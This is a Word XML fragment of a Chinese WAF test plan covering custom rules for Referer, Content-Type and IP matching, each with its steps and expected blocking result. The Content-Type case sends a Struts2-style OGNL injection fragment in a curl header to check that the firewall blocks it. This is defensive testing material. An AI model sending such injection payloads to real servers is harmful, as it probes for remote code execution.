              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="044B17C2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点</w:t>
            </w:r>
            <w:r>
              <w:t>Referrer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">字段中包含 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FDB205A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="357" w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">curl -vv http://www.site.com/ReferrerText.php -H “Referer: </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "http://www.qq.com/abc.html" </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
              </w:rPr>
              <w:t>http://www.qq.com/abc.html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24750359">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5.   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录匹配该条自定义规则的流量日志。</w:t>
            </w:r>
            <w:bookmarkEnd w:id="151"/>
            <w:bookmarkEnd w:id="152"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4E128FA5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="15ECFEBF">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="3FF5A6F3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="48952F7F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="391D7ED7">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B97C60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D7659F6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1E4BE804">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6110A2DD">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5644E814">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C882168">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="406621A3">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29253A04">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F7017">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc21077824"/>
      <w:bookmarkStart w:id="154" w:name="_Toc81916128"/>
      <w:bookmarkStart w:id="155" w:name="_Toc903095174"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Type匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
      <w:bookmarkEnd w:id="154"/>
      <w:bookmarkEnd w:id="155"/>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6B1C4AF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7AEBE484">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="46AA84B4">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义Content</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Type匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="34CA90DC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3CD33881">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0E2B78EB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配Content</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Type规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3253A920">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5A241852">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="35C5D7CF">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实server；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01F4E7C3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将WEB流量牵引至WAF检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B6BC2DD">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点Content-Type字段中包含Multipart时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="601F5367">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="357" w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>curl -vv http://www.site.com/index.php -H “Content-Type: %{#context['com.opensymphony.xwork.dispatcher.HttpServletResponse']}Multipart”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCF9353">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看WAF是否对攻击进行拦截并记录匹配该条自定义规则的流量日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="23233B46">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4E8BFF86">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6BD69BC8">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="64874AB9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="19A5AA66">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0386C6DA">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97174BF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="354A7785">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04D7FAC4">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CBBF5AF">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01CD3B88">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5098A0E6">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A617C69">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="_Toc21077825"/>
      <w:bookmarkStart w:id="157" w:name="_Toc81916129"/>
      <w:bookmarkStart w:id="158" w:name="_Toc2053656069"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
      <w:bookmarkEnd w:id="157"/>
      <w:bookmarkEnd w:id="158"/>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41BC6861">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="58EE8E5A">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="52D7F41A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义IP匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6DDC81E3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="73FD3065">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="533686C1">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配IP规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7C31A01E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3F6FD142">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="3FBBAB1E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA06515">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D529F89">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点时的ip为1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">72.16.160.1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55BF1A7E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>让ip为1</w:t>
            </w:r>
            <w:r>
              <w:t>72.16.160.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>机器访问一下防护站点即可；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F6837CE">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349D7085">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="16D88747">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0BCA6352">
            <w:pPr>
              <w:pStyle w:val="89"/>
